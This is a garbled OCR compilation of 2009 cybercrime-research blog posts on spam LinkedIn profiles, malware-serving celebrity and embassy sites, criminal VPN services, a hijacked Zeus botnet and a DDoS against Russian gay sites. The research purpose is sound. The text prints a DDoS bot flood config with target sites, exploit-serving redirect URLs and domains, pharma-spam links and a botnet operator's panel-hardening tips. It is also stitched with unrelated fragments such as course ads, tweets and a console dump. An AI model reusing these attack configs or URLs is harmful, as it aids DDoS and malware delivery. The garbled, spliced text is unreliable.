linkedin .com/in/OnlineBuyLorazepam 
linkedin .com/in/propecia 

linkedin .com/in/OnlineBuyAllegra 
linkedin .com/in/CheapBuyMeridia 
linkedin .com/in/OnlineBuyZithromax 
linkedin .com/in/OnlineBuyCelexa 
linkedin .com/in/clomid 

linkedin .com/in/clonazepam 

linkedin .com/in/BuyCheapNeurontin 
linkedin .com/in/cheapfioricet 
linkedin .com/in/OnlineBuyClomid 
linkedin .com/in/OnlineBuylbuprofen 
linkedin .com/in/OnlineBuyZoloft 
linkedin .com/in/OnlineBuyToprol 
linkedin .com/in/OnlineBuyAleve 
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Acquiring new users in a highly competitive Web 2.0 world is crucial, no doubt about it. 
But in 2009, if you’re not at least requiring a valid email address, a confirmation of the registra- 
tion combined with a CAPTCHA to at least slow down the bogus account registration process 
and ruin their efficiency model - systematic abuse of the service is inevitable ([4]Commercial 
Twitter spamming tool hits the market). 


LinkedIn’s abuse team has already been notified of these accounts. 


1. http: //ddanchev. blogspot .com/2009/01/dissecting-bogus-linkedin-profiles.htm 
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5.2.9 Fake Celebrity Video Sites Serving Malware - Part Three (2009-02-24 00:47) 
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Lisa Bonet was born on November 16, 1967 in San 
Francisco, California, and she began her acting 
career when she was just 11 years of age. She 
persevered and she went to the try-outs of many 
commercials and television shows, until finally, she 
was able to land a role in Angel Heart, a movie made 
under the direction of Alan Parker with Mickey 


Rourke as one of the stars. Lisa Bonet then had her Attention!!! 
most memorable role to date as Denise Huxtable in . to download ActiveX video codec es ay en, 
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In the overwhelming sea of [1]template-ization of malware serving sites, (naked )celebrities 
would always remain the default choice offered in the majority of bogus content generating 
tools taking advantage of the high-page rank of legitimate Web 2.0 services. 


Following the 2008’s [2]Fake Celebrity Video Sites Serving Malware series ([3]Part Two) 


the very latest addition to the series demonstrates the automatic abuse of legitimate infras- 
tructure - in this case Blogspot for the purpose of traffic acquisition. 
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The following are currently active and part of the same campaign: 
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Compared to the single-post only Blogspots, the following domains top100videoz.com; 
cinemacafe.tv; xvids-top.com have a lot more bogus content to offer. 


1. http://ddanchev. blogspot .com/2009/02/template-ization-of-malware-serving.htm 
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3. http: //ddanchev. blogspot .com/2008/08/fake-celebrity-video-sites-serving.htm 


5.2.10 The Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Two 
(2009-02-24 16:10) 


- Internet 


With VPN-enabled [1]malware infected hosts easily acting as stepping stones thanks to 
modules within popular malware bots, next to commercial VPN-based services, [2]the cost 
of anonymizing a cybecriminal’s Internet activities is not only getting lower, but the process 
is ironically managed in data retention heavens such as the Netherlands, Luxembourg, USA 
and Germany in this particular case, by using the services of the following ISPs: LeaseWeb 
AS Amsterdam, Netherlands; ROOT-AS root eSolutions; HOPONE-DCA HopOne Internet Corp.; 
NETDIRECT AS NETDIRECT Frankfurt, DE. 


- Traffic - eth 


bits per second 


18:00 00:00 06:00 12:00 


Operating since 2004, yet another "cybercrime anonymization" service is using the bandwidth 
of legitimate data centers in order to run its VPN/Double/Triple VPN channels service which it 
exclusively markets in a "it’s where you advertise your services, and how you position yourself 
that speak for your intentions" fashion. 
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- Traffic - ethd 
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wi 
o 
o 
- 
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Description of the service: 


". We will never sought to make the service cheaper than saving the safety of customers. 


- Our servers are located in one of the most stable and high-speed date points (total channel 
gigabita 1.2) 

- Only we have the full support service to the date of the center, which prevents the 
installation of sniffers and monitoring. 

- We do not use standard solutions, our software is based on the modified code. 

- Only here you get a stable and reliable service. 


Characteristics of Sites: 

- Channel 100MB, total channels gigabita 1.2. 

- MPPE encryption algorithm is 128 bit 

- Complete lack of logs and monitoring - a guarantee of your safety. 
- Completely unlimited traffic. 

- Support for all protocols of the Internet." 


a 


~ YourPC SOCKS Server OpenVPN Server Internet 


On the basis of chaining several different VPN channels located in different countries all man- 
aged by the same service, combined with a Socks-to-VPN functionality where the Socks host 
is a malware compromised one, all of which maintain no logs at all, is directly undermining the 
usefulness of [3]already implemented data retention laws. Moreover, even a not so technically 
sophisticated user is aware that chaining these and adding more VPN servers in countries 
where no data retention laws exist at all, would result in the perfect anonymization service 
where the degree of anonymization would be proportional with the speed of the connection. 
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In this case, it’s the mix of legitimate and compromised infrastructure that makes it so 
cybercrime-friendly. 


In respect to the "no logs and monitoring for the sake of our customers security" claims, 
such services are based on trust, namely the customers are aware of the cybercriminals 
running them "in between" the rest of the services they offer, which and since they’re all "on 
the same page" an encrypted connection is more easily established. However, an interesting 
perspective is worth pointing out - are the owners of the cybecrime-friendly VPN service 
forwarding the responsibility to their customers, or are in fact the customers forwarding the 
responsibility for their activities to the owners which are directly violating data retention laws 
and on purposely getting rid of forensic evidence? 


Things are getting more complicated in the "cybercrime cloud" these days. 


1. http: //ddanchev. blogspot .com/2008/02/malware-infected-hosts-as-stepping.htm 
2. http: //ddanchev. blogspot .com/2008/10/cost-of-anonymizing-cybercriminals .htm 


3. http: //en.wikipedia. org/wiki/Telecommunications_data_retention#Home_Office_Voluntary_Code_of_Practice_on_ 


Data_Retentio: 


5.2.11 Help! Someone Hijacked my 100k+ Zeus Botnet! (2009-02-26 21:42) 


Zeus :: Bots 


Sy, 
CSN CA OC I 
Empty 


Search with template 


Uploaded files 


Logout 


I’ve been looking for a similar chatter for a while now, given the existence of a [1]remotely 
exploitable vulnerability in an old Zeus crimeware release allowing a cybercriminal to inject a 
new user within the admin panel of another cybecriminal. 


It appears that this guy has had his 100k+ Zeus botnet hijacked several months ago, 
and now that he’s managed to at least partly recover the number of infected hosts in two 
separate botnets, is requesting advice on how to properly secure his administration panel. 


Here’s an exact translation of his concerns : 

"Dear colleagues, I'd like to hear all sorts of ideas regarding to security of Zeus. I’ve been 
using Zeus for over an year now, and while | managed to create a botnet of 100k infected 
hosts someone hijacked it from me by adding a new user and changing my default layout 
to orange just to tip once he did it. Once | fixed my directory permissions. | now have two 
botnets, the first one is 30k and the second (thanks to a partnership with a friend) is now 3k 
located at different hosting providers. 
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Sadly, yesterday | once again found out that my admin panel seems to have been com- 
promised since all the files were changed to different name, and access to the admin panel 
blocked by IP. Yes, that seems to be the IP the hijacker is using. The attacker has been 
snooping Apache logs in order to find IPs that have been used for logging purposes and 
blocked them all. Therefore | think the new user has been added by exploiting a flaw in Zeus. 
In my opinion a request was made to the database, either through an sq injection in s.php a 
file or a request from within a user with higher privileges. 


Since I’ve aplied patches to known bugs, this could also be a compromise of my hosting 
provider. So here are some clever tips which | offer based on my experience with securing 
Zeus. 


- Change the default set of commands, make them unique to your needs only. 

- If itis possible to prohibit the reading and dump tables with logs all IP, to allow only certain (so 
that the crackers were not able to make a dump and did not read the logs in the database). 

- If it is possible to prohibit editing of tables with all the commands of Zeus IP, to allow only 
certain (that could not be "hijacked", insert the command bots)" 


Surreal? Not at all, given the existing monoculture on the crimeware market. Morever, 
yet another vulnerability was found in the Firepack web malware exploitation kit earlier this 
month ([2]Firepack remote command execution exploit that leverages admin/ref.php). This 
exploit could have made a bigger impact in early 2008, the peak of the Firepack kit, which 
was also localized to Chinese several months later: 


[3]The FirePack Web Malware Exploitation Kit 
[4]The FirePack Exploitation Kit - Part Two 
[5]The FirePack Exploitation Kit Localized to Chinese 


Ironically, cybercriminals too, seem to be using outdated versions of their crimeware. 


Related posts: 

[6]Crimeware in the Middle - Adrenalin 

[7]76Service - Cybercrime as a Service Going Mainstream 

[8]Zeus Crimeware as a Service Going Mainstream 

[9]Modified Zeus Crimeware Kit Gets a Performance Boost 
[10]Modified Zeus Crimeware Kit Comes With Built-in MP3 Player 
[11]Zeus Crimeware Kit Gets a Carding Layout 

[12]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw 
[13]Crimeware in the Middle - Zeus 


. http: //ddanchev. blogspot . com/2008/06/zeus- crimeware-kit-vulnerable-to.htm 
. http: //packetstorm.linuxsecurity.com/0902-exploits/firepack-exec.txt 


1 
2 
3. http://ddanchev. blogspot . com/2008/02/firepack-web-malware-exploitation-kit.htm 
4. http://ddanchev. blogspot .com/2008/04/firepack-exploitation-kit-part-two.htm 

5. http://ddanchev.blogspot.com/2008/05/firepack-exploitation-kit-localized-to.htm 
6 

7 

8 

9 


. http: //ddanchev. blogspot .com/2009/02/crimeware-in-middle-adrenalin.htm 


. http://ddanchev. blogspot . com/2008/08/76service-cybercrime-as-service-going. html 


. http: //ddanchev.blogspot .com/2008/12/zeus-crimeware-as-service-going .htm 


. http: //ddanchev. blogspot .com/2008/11/modified-zeus-crimeware-kit-gets.htm 
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5.2.12 Inside a DIY Image Spam Generating Traffic Management Kit (2009-02-26 22:48) 
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Whatever the spammer/pharma master or plain simple cybercriminal requires - the soamware 
vendors deliver so that a win-win-win scenario takes place for the buyer, the seller, and the 
enabler, in this case the affiliate network allowing image-based spam compared to Web 1.0’s 
link based performance measurement. 


That’s the main objective of one of the very latest traffic management kit is once again 
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quality assurance in the process of managing image-spam based campaigns. 


Settings | € i ms | Profiles | Stats | Get Links 
Campaigns: 


Action 


(Edit|fShewAds)[x}{+} 


Add Campaiga 


Here’s a translated description of the traffic management kit: 

"As you know, now many pay per click networks offer within their ad scripts the so called 
graphic feeds.Any site allowing the use of the IMG tag can serve them, that includes popular 
free web based services. The problem so far has been the lack of quality measurement and 
optimization of this approach. 
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This imposes severe restrictions on the ability to convert traffic to the resource, the automatic 
redirection of which is impossible. Our system allows you to allows you to create your own 
ads and send traffic to them to where you think they fit. 


How it works: you create a campaign with your own keywords, generate a random im- 
age, customize it, generate a link to the ad and paste it into the hosting site, or include it in 
your email campaigns. By doing this you’re able to add more interactivity in your campaigns 
and improve your click through rates. 
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- Manage design ads through profiles within the system, save your creativity 

- Use of any image as the ads. This may be a screenshot of your pharmacy, banner, and even 
anything 
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- Combine different types of simple ads on the same page 

- Create messages with any embedded images. For example (click on picture to see actual ad 
size) 

- Use alternative keywords in the references (some of the resources do not allow to post links 
containing the names of pills and other banned words) 

- Filter incoming traffic to the countries of the User-Agent, IP or range of IP" 


It’s important to emphasize on the fact that this is a DIY image-spam generating kit, in 
comparison, the much more efficient and again random image-spam generating service is 
offered by the sophisticated and experienced managed spam service providers who still prefer 
working with reputable and well known individuals, instead of going mainstream. 


Related posts: 

[1]Quality Assurance in a Managed Spamming Service 
[2]Managed Spamming Appliances - The Future of Spam 
[3]Dissecting a Managed Spamming Service 

[4]Inside a Managed Spam Service 

[5]Spamming vendor launches managed spamming service 
[6]Segmenting and Localizing Spam Campaigns 
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icmp_treq = DU 
icmp_size = 1000 

syn_freq = 2000 

spoof_ip= 1 

attack_mode = 0 

max_sessions = 30 

http_freq = 50 

http_threads = 20000000000000000000000 

tcpudp_freq = 500 

udp_size = 100 

tcp_size = 100 

cmd = flood http 

gogay.ru, igay.ru,androgin.ru,boysclub.ru,egay.ru, gaylines.ru,gaymoney.ru, gayplanet.ru,gayrelax.ru,xabalka.ru 
ufreq = 1 

botid = 


From Russia with homophobia? 


A week long DDoS attack launched against Russia’s most popular commercial homosex- 
ual sites has finally ended. The simultaneous attack managed to successfully shut down the 
web servers of most of the sites, which responded with filtering of all traffic that is not coming 
from Russia. Ironically, the attack was in fact coming from Russian, courtesy from a botnet 
operated by a DDoS for hire service. 


Here’s a list of the sites that were subject to the DDoS, with the majority of them re- 
turning "503 Service Temporarily Unavailable" error message during last week : 
gogay.ru 

lgay.ru 

androgin.ru 

boysclub.ru 

egay.ru 

gaylines.ru 

gaymoney.ru 

gayplanet.ru 

gayrelax.ru 

xabalka.ru 


On the 25th of January, gogay.ru was among the few sites to issue a statement and 
confirm the attacks offering financial reward for information leading to the source : 
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Personally Identifiable Information Regarding some of the most High-Profile 
Internet Cybercriminals Cybercrime Gangs and Various Internationally Recognized 
Cyber Threat Actors — A 2021 Compilation 


By Dancho Danchev 
24.07.2021 
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QOKYMEHTOB 


semen TELEGRAMMFACEBOOK rapaHt 
SSH GOLD wwz visaSHOP YCNYTV 


_EXCHANGEBITCOIN #20 
skyPE WINDOWS TEnETPAM 
MPOBEPEHEXPLOIT ~ 


proxy PLA TINUIV WM YANDEXMONEY 
PASSPORT *erct rose PAYONEER 
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Distribution of keywords (Frequency) 


ore NPOBEPEH 5.5% 
EXCHANGE 5,7% 


EXPLOIT 5.9% 


SSH 3.5% 
WM 3,4% WINDOWS 6,6% 
PLATINUM 3.2% 
WEBRTC 1,1% 
GOLD 3,1% ANDROID 1,1% 
sa OPENVPN 1,1% 
 SCTWITTER 1.4% 


YCNYM 3.1% 


PASSPORT 3,0% 


YANDEXMONEY 3,0% ge A ea a 
TELEGRAMM 2.8% PROXY'1; ’ 
TENEFPAM 2.8% PAYONBERAT SAPP 1,6% 
FACEBOOK 2,7% FLOOD 2,2% CRYPT 1,6% 
WMZ 2,4% VISA 2.2% 
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CopeTe mo paboTe c cavirom 


"Yesterday (25 February), our site is subjected to serious hacker attacks (flood-attack capacity 
of 2 Mbit / sec). The attack reflected, but is still continuing at other gay sites lgay.ru, 
egay.ru, xabalka.ru and so on. If you have any information (we are willing to pay for uHqy of 
tailor-made) on the causes of the attack, if you - the webmaster and your own gay website 
exposed attacks (if the last few days your site has been slow to load and create a greater 
burden - it is very likely that the same attack, only disguised), sabotage, blackmail or extortion 
by unidentified persons - always contact us." 


Since the sites are commercial providers of homosexual multimedia content and are thereby 
bandwidth-consuming, the attacks were aiming to disrupt their business operations, and they 
managed to do so. Russia’s government is well known to have [1]a rather violent take on 
homosexuality in general, and with overall availability of outsourced DDoS attack services 
offering anonymity and destructive bandwidth, the efforts to request such an attack remain 
minimal. 


1. http://www. workers .org/2006/world/russia-0608/ 
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Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 
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24th of November 


Nima Salehi 
Eovesson ~ 
Sadra University 
nima.saichi@yshoo.com 
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So, what this means is that any individual's success tn the industry comes down to things like reputation, how well you 
can bullshit, etc. But ultimately we have no way to differentiate, say, Bruce Schneier, who has a long academic- and 
professional-grade track record and a habit of writing in a highly intellectual fashion on difficult topics, from Dancho 
Danchev, who is a random Russian dude very few people know anything about, who posts random snippets of facts that 
pass for “analysis.” 
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Forum Launch 


Announcing the 
Official launch of the 
World's Largest and 

Most Vibrant Hacking 
and Security 
Community -The 
Underground 20 


Hackers in 
Space 


The official launch of 
The Astalavista 
Security Cubesat 
Internet-connected 
Satellite in Space 
empoweing a new 
generation of hackers 


Portfolio 

Expansion 
Announcing a market- 
leading and global 
expansion in multiple 
Cyber Security and 
Hacking market- 
verticals positioning 
the company as a 
World's leading 
market leader 


Announcing the 
Worid's Largest and 
Most Vibrant Self- 
Sufficient and Self- 
Managing Hacker 
and Security Expert 
Cyber Economy 
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loT Revolution 
“A Hacker anda 
Security Expert in 
Every Home" - The 
Existence of The 
World's Largest and 
Most Vibrant Self- 
Sufficient Cyber 
Security Economy 


Global R&D 
Labs 


Announcing a diverse 
set of research and 
development Labs 
leading the company 
into the Worid of 
Cyber Security 
market and product 
expansion 
domination globally 


Virtual 
Dimension 


Announcing the general 
availability of the 
World's Leading Hacker 
and Security Virtual 
Simulation empowering 
millions of users 
globally with an 
information-driven 
power Hacker 
expenence 
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hilary kneber @hilarykneber - Jan 16, 2011 Vv 
#DANCHO DANCHEV Does anyone know ..Is there a way I can determine 
the exact date that Dancho Danchev began to “unfollow” me? 
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5.3.3 Inside (Yet Another) Managed Spam Service (2009-03-09 22:18) 


Several years ago, getting into the spam business used to involve the [1]process of harvesting 
emails, figuring out ways to [2]segment the database, localize the soam campaign by using a 
free translation service [3]eventually ruining the social engineering effect, creating your very 
own botnet and coming up with creative ways to bypass anti-spam filters, ensuring the botnet 
remains operational, coming up with ways to obtain access to IPs with clean reputation, with 
little or no campaign effectiveness measurement at all.. 


These relatively higher market entry barriers are long gone. Today, every single step in 
[4]the spamming process is managed and can be [5]Joutsourced in a cost-effective manner to 
the point where the [6]one-stop-shop spam vendors have vertically integrated and occupied 
[7]every single market segment possible in order to increase the "lifetime value" of their 
potential customers. 
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lo \ users/klout_ id]> use users/klout_topics 
users/klout_topics]> run 
@xcharlie has top Hacking, Cybersecurity, Privacy, Information Security, Malware 
GOVCERT_NL has >: Privacy, Microsoft Windows, Information Security, Computer Networking, Hacking 
Anon_Operations h ics: Hacking, Activism, Privacy, Information Security, Wikileaks 
AnonymousIRC h opics: Sony, Politico, Privacy, Computers, Wikileaks 
CERTFI ha Finland, Hacking, Helsinki, Sony, Privacy 
JanetCSIRT opics: Sony, Hacking, Privacy, Information Security, Cybersecurity 
LulzSec has topics: Gold, BlackBerry, Kingdom of Jordan, Poker, Czech Republic 
Cybersecurity, Malware, Information Security, Hacking, Privacy 
OperationLeakS topics: Wikileaks, Occupy Wall Street, Hacking, Privacy, Central Intelligence Agency 
TheHackersNews |h pics: Eneryption, Open Source, Privacy, Computers, Cybersecurity 
VUPEN has topi Cybersecurity, Sony, Hacking, Privacy, Computer Networking 
WiFuzz he Hacking, Information Security, Cybersecurity, Malware, Computers 
anonops | top Wikileaks, Hacking, Computers, Central Intelligence Agency, iPhones 
alexsotirov | t cs: Hacking, Computers, Information Security, Sony, Privacy 
bradarkin has top Sony, Cybersecurity, Hacking, Adobe, Privacy 
danchodanchev he pics: Sony, Hacking, Privacy, Computers, Malware 
davesitel | Cybersecurity, Hacking, Privacy, Malware, Information Security 
diocyde has cs: Malware, Hacking, Information Security, Cybersecurity, Forensics 
dinodsizovi has cs: Information Security, Cybersecurity, Hacking, Malware, Computer Networking 
egyp7 has topi Computer Networking, Open Source, Privacy, Computers, Cybersecurity 


halvarflake has cs: Hacking, Cybersecurity, Malware, Privacy, Information Security 


Sony, Hacking, Computers, Information Security, Privacy 
has to Cybersecurity, Computer Networking, Information Security, Cisco, Malware 

kevinmitnick >i Hacking, Computers, Cybersecurity, Computer Networking, Software 
lennyzeltser has Cybersecurity, Malware, Technology, Information Security, Computer Networking 
adowd has topi Hacking, Cybersecurity, Information Security, Privacy, Computers 
mikko has t Sony, Computer Networking, Encryption, Open Source, Nokia 
owasp has topi Cybersecurity, Hacking, Java, Privacy, Malware 
aesUeecrsepcnes has topics: Microsoft, Cybersecurity, Computers, Information Security, Hacking 
pusscat h cs: Hacking, Information Security, Malware, Cybersecurity, Sony 


, snowf1Ow | Malware, Sony, Hacking, Computers, Privacy 


taosecurity ha cs: Cybersecurity, Hacking, Malware, Computer Networking, Information Technology 
taviso has t Hacking, Cybersecurity, Malware, Computers, Sony 

teamcyaru has Cybersecurity, Hacking, Malware, Ransomware, Firefox 

thegrugg | topi Cybersecurity, Privacy, Hacking, Information Security, Computers 

tinman2k Sony, Hacking, Computers, Information Security, Malware 


cicuebenett ovelyhorse] [users/klout_topics]> J 
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108.182.196.211 


[306] 


21367 


[310] 
21371 


[311] 


21372 


When do you know that it’s going to get uglier in the long term? It’s that very special moment 
in time when the backend for such [8]a managed spam system utilizing malware infected 
hosts and legitimate servers for achieving its objectives, goes mainstream and its authors 
remove the "proprietary, high-profit margin revenues earning business model" label from it. 


And with this particular moment in time already a fact since the middle of 2008 ([9]Spamming 
vendor launches managed spamming service), yet another new market entrant is pitching its 
managed spam service with the ambition to monetize his access to a particular botnet, and 
break-even from the investment made in the backend system. 
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Astalavista Security Group Security Training - 
Basics of Cybercrime 


Explore the Basics of Cybercrime Research 


Change photo 
by Dancho Danchoy a a 


COURSE DETAILS 
Astalavista Secunty Group 2.0 - The World's Most Popular information Secunty Portal is 
Highlights proud to present the general availability of a new course material entitied - ‘The Basics of 
Cybercrime” offering in-depth understanding of basic Cybercrime research topes targeting 
v Basics of Cybercrime Research a variety of audience targeing novice and expenenced security researchers empowenng 
Vv In-Depth Discussion on The Most Protife Cybercrime them with the necessary data information and knowledge to stay ahead of current and 
Groups and Gangs emerging threats 
¥ In-Depth Discussion on Public Cybercrime Research 
Tools 
Vv In-Depth Discussion on Proprietary Cybercrime Reseach 
Tools 8 
v In-Depth Discussion on the Future of Cybercrime 
Fighting Chapter 1: Introduction to Cybercrime Research 
Chapter 2: Basics of Cybercrime Research 
= e a 
Cc —— ‘a a — Chapter 3: In-Depth Dis on on Cybercrime Fighting Methodologies 
Chapter 4: In-Depth Discu nthe! Prolific Cybercrime Groups 
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Astalavista Security Group Security Training - 
Basics of Cyberwarfare 


Highlights 


wv Whats Cyberwarfare? 
Vv In-depth Discussion on the Basics of Cyberwarfare 
wv Overall overview of The Top Cyberwarfare Service 


Prowsders 


Explore of the Basics of Cyberware 


Vv’ In-depth Discussion on Nation-State Actors 
Ww Overview of Current and Emerging Cyberwarfare 
Services and Technologies 


About Instructor 


o 
a 
Level 


Change photo 


COURSE DETAILS 


Astalavista Secunty Group 2.0 - The World's Most Popular Information Secunty Portal is 
Proud to present the general availabilty of a new course matenal entitled - The Basics of 
Cyberware offering an in-depth overview of the World of Cyberwarfare inciuding in-depth 
discussion of various technologies service prowders ofensive and Gefenstive cyberwarfare 
methodologies including in-depth discussion on various nation-state actors further offering 
an in-depth overview of current and emerging trends including an in-depth discussion on 
the future of cyberware 


Chapter 1 


Chapter 2 


Chapter 3 


Chapter 4 


ntroduction to Cyberwarfare 


Basics of Cyberwarfare 


Overview of Public Cyberwarfare Tools 


Overview of Proprietary Cyberwarfare Tools 
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Rung Rep info 
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Frates keto 


RESET 


Win XP - 253¢ 


- 1 ~o 
vo - 2082 © 

Ms + “ (4 

. LET 06Ts Sim fie BOTs we Bie PTR LOT Okie Se _f0Ts 


With 9 different campaigns already finished (See the top screenshot) and another one cur- 
rently in progress spamming out 3215 emails using 1672 infected hosts based on a harvested 
email database consisting of 306204 emails (notice the percentage of non-existent emails 
potentially spam-poison traps), his business model is up and running. 


Further developments and new features within the service would remain under close 
monitoring in the future as well. In particular, the original vendor’s updates which would 
ultimately affect all of his "value-added partners" improved managed spamming capabilities. 


. http://ddanchev. blogspot .com/2008/08/aut omatic-email-harvesting-20.html 
. http: //ddanchev.blogspot . com/2008/05/segmenting-and-localizing-spam.htm 


. http: //ddanchev.blogspot .com/2008/11/localizing-cybercrime-cultural .htm 
. http://ddanchev. blogspot .com/2009/02/quality-assurance-in-managed- spamming. html 
. http: //ddanchev. blogspot. com/2007/10/managed- spamming-appliances-future-of.htm 


. http: //ddanchev.blogspot .com/2008/07/dissecting-managed- spamming-service .htm 


OMONAURWNE 


. http: //ddanchev. blogspot .com/2008/10/inside-managed-spam-service.htm 
. http://blogs.zdnet .com/security/?p=1899 


5.3.4 Azerbaijanian Embassies in Pakistan and Hungary Serving Malware 
(2009-03-11 15:45) 
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Astalavista Security Group Security Training - 
Basics of OSINT 


Explore the Basics of OSINT 


by Dancho Danchey mi 


Change photo 


COURSE DETAILS 
Astalavista Security Group 20 - The World's Most Popular information Security Portal 
Highlights proud to prevent the general availability of a new Course maternal entitled - Basics of 
OSINT (Open Source intelligence) aiming to familiarize potential intelligence Analysts and 
wv The Basics of OSINT Explained security researchers with an in-depth understanding of the basics of OSINT (Open Source 
wv In-depth Discussion on Public OSINT Toots intetagence including in-depth discussion and demonstration of public and proprietary 


OSINT tools tactics techniques and procedures (TTPs) With millions of active users across 
the globe Astalavista Secuntly Group i proud to empower and provide the necessary data 
information and knowledge successfully reaching and empowering hundreds of 
thousands of users globally on a daily basis 


in-depth Discussion on Private OSINT Tools 
In-depth and Comprehensive OSINT Case Studies 
Vv In-depth and Extensive Real-World and OSINT Examples 


Chapter1: Introduction to OSINT 


About Instructor Chapter 2: Basics of OSINT 


Dancho Danchev = - 
| » Chapter 3: OSINT Technologies 
Dancho Danchev is the worlds leading expert in the 


[332] 
21388 


Hacked By Scary Boys Di... (2) 
Digital West Asia Securit... (2) _ 


Defaced (4) 


Hacked (2) 


—<e- ae Team (54 — 
“i 
*d/ os 


SS oa} 
) 


ackedypana ta) la 


Hacked By Iran Black Ha... (3) 


' ‘ 
Vs 


[333] 


21389 


SIZE: 124.929 
REMOTE ACCESS TROJAN Portis? 
Wor E-MAR. PROPAGATION 
Wor IRC PROPAGATION 
KEYSTROKE LOGGER 
FTP Server 
PASSWORD GRASBER 
DESTRUCTIVE 
TARGETS SPECIFIC PROGRAMS 
TP STARTS EVERYTIME Windows STARTS 


Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Lid. ~- Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 
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azerembassy 


ional 


betstarwager.cn —fin.cgi?cocacola6 394 = text/html; c... 


The very latest addition to the "Compromised International Embassies Series" are the Hungar- 
ian and Pakistani embassies of the Republic of Azerbaijan, which are currently [1]iFramed with 
exploits-serving domains. 


Is there such a thing as a coincidence, especially when it comes to three malware embed- 
ded attacks in a week affecting [2]Azerbaijan’s USAID.gov section, and now their Pakistani 
(azembassy.com.pk) and Hungarian (azerembassy.hu) embassies? Depends, and while the 
USAID.gov attack was exclusively orchestrated for their section, the Pakistani and Hungarian 
ones are part of a more widespread campaign. Theoretically, this could be a noise generation 
tactic. Here’s a brief assessment of the attacks. 


NS " A 
C etckeouneren tp nsz.etetcouneren —A-pe 109190173251 __ soy 
x 193.138.172.022 —AS-ge asa4245 
NET. 
nsL.clickcounercn —sA_y 193.138.173.250 ee 


er 


mail.clickcouner.cn 


Both embassies are embedded with identical domains, parked at the same IP and redi- 
recting to the same client-side exploits serving URL operated by Russian cybercriminals. 
filmlifemusicsite .cn/in.cgi?cocacola95; promixgroup .cn/in.cgi?cocacola91; betstarwager 
.cn/in.cgi?cocacola86 and betstarwager .cn/in.cgi?cocacola80 all respond to (78.26.179.64; 
66.232.116.3) and redirect to clickcouner .cn/?t=5 (193.138.173.251) 


Parked domains at 78.26.179.64; 66.232.116.3 : 
denverfilmdigitalmedia .cn 
litetopfindworld .cn 
nanotopfind .cn 
filmlifemusicsite .cn 
litetoplocatesite .cn 
litedownloadseek .cn 
yourliteseek .cn 
diettopseek .cn 

bestlotron .cn 
promixgroup .cn 
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betstarwager .cn 


What prompted this sudden attention to Azerbaijanian web sites? [3]Azerbaijan’s Pres- 
ident visit to Iran in the same week when Russian Foreign Minister [4]Sergei Lavrov is 
visiting Azerbaijan? And why is the phone back domain for the malware served at the US- 
AID.gov site phoning back to a [5]well known Russian Business Network domain (fileuploader 
.cn/check/check.php) which was again active in January, 2008 and used by one of my favorite 
malware groups to monitor during 2007/2008 - the "[6]New Media Malware Gang" ([7]Part 
Three; [8]Part Two and [9]Part One)? 


Food for thought. 


Related posts: 

[10]Embassy of India in Spain Serving Malware 
[11]Embassy of Brazil in India Compromised 
[12]The Dutch Embassy in Moscow Serving Malware 
[13]U.S Consulate in St. Petersburg Serving Malware 
[14]Syrian Embassy in London Serving Malware 
[15]French Embassy in Libya Serving Malware 


. http://securitylabs.websense.com/content/Alerts/3316.aspx 
. http: //blogs.zdnet .com/security/?p=281 


ttp://www.isna.ir/ISNA/NewsView. aspx? ID=News- 1304923&%Lang= 


. http://abc.az/eng/news_11_03_2009_33030.htm 


| http://adanchey blogspot .con/2008/08/ney-nedie-ualvare-gang-part-four ht 
_http://adanchov blogspot .con/2008/02/nev-nodia-nalvare~gang-part-three. neal 
_ http: //adanchey blogspot. con/2007/12/ney-nedie-nalvare-gang-part-tvo heal 

_ http: //adanchey blogspot. con/2007/11/ney-nedia-ualvare-gang. nt 


ttp://ddanchev. blogspot .com/2009/01/embassy-of-india-in-spain-serving. htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot. com/2008/0/xone-fake-account~suspended-notices tal 
6 
7 
8 
9 


ttp://ddanchev. blogspot .com/2008/11/embassy-of-brazil-in-india- compromised. htm 


12. http://ddanchev. blogspot .com/2008/01/dutch- embassy- in-moscow-serving-malware.htm 
13. http://ddanchev. blogspot .com/2007/09/us- consulate-st-petersburg- serving. htm 
14. http://ddanchev. blogspot .com/2007/09/syrian- embassy-in-london-serving. htm 


ttp://ddanchev. blogspot .com/2007/12/have-your-malware-in-timely-fashion.htm 


5.3.5 Who’s Behind the Estonian DDoS Attacks from 2007? (2009-03-12 17:39) 


The rush to claim responsibility for 2007’s DDoS attacks against Estonia 


5.3.6 Ethiopian Embassy in Washington D.C Serving Malware (2009-03-18 23:10) 
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Astalavista Security Group Security Training - 
Basics of Cyber Jihad 


Explore the Basics of Cyber Jihad 


COURSE DETAILS 
Astalavista Security Group - The World's Most Popular Information Security Portal & proud 
Highlights to present the general availability of a new course material entitled - “The Basics of Cyber 
Ahad’ offering novice and experienced security researchers and Intelligence Analysts an 
wv The Basics of Cyber Jinad in-depth overview of Cyber Jthad including »-depth discussion of vanous coumer- 
v Overview of Basic Cyber Ahad Detection and Prevention imtellgence methodologies and approaches further ofenng an im-depth discussion on 
Mechanisms current and emerging Cyber Ahad trends including an in-depth discussion of vanous 
a h Diecussion on Public Cyber J Detection current and emerging Cyber Jihad detection and response mechanisms 
Tools 
vv In-Depth Discussion on Proprietary Cyber Jihad 
Detection Tools 
wv In-depth Discussion on Real-World Cyber Jihad Case =) 
Studies 


Chapter2 Introduction to Cyber Jihad 


a Chapter 2: Basics of Cyber Jihad 


Certificate 


° 
a 
Level 
| No | c.. Engich 0us 


Chapter 3: In-depth Discussion of Public Cyber Jihad Tools 


Chapter 4: In-Depth Discussion of Proprietary Cyber Jihad Tools 
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Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 


Views 
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@ united states 1.45M 
@ ita 633K 
@ Spain 476K 
@ France 472K 
@ Germany 339K 
® United Kingdom 186K 
@ Russia 154K 
So Norway 96.1K 
@ china 88.8K 
©) Other 1.47M 
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[9] 0 200 HTTP ethiopianembassy.org } 916 ~~ text/html 
7) 502. HTTP itvy.com _findex.php 512 — text/html 
@)2 200 HTTP ethiopianembassy.org findex.shtml 27,841 text/html 
